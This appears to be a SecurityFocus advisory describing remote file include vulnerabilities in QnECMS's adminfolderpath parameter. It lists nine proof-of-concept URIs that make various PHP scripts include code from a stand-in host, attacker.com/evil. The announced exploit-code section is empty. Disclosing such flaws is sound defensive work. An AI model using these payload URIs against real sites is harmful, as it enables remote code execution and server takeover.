QnECMS Adminfolderpath Parameter Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[QnECMS_path]/admin/include/headerscripts.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/admin/include/footerhome.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/admin/include/footermain.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/photogallery/headerscripts.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/templates/footerhome.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/templates/footermain.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/templates/headermain.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/templates/sitemapfooter.php?adminfolderpath=http://attacker.com/evil? #
http://www.example.com/[QnECMS_path]/templates/sitemapheader.php?adminfolderpath=http://attacker.com/evil?

The following exploit code is available:


 

Privacy Statement
Copyright 2010, SecurityFocus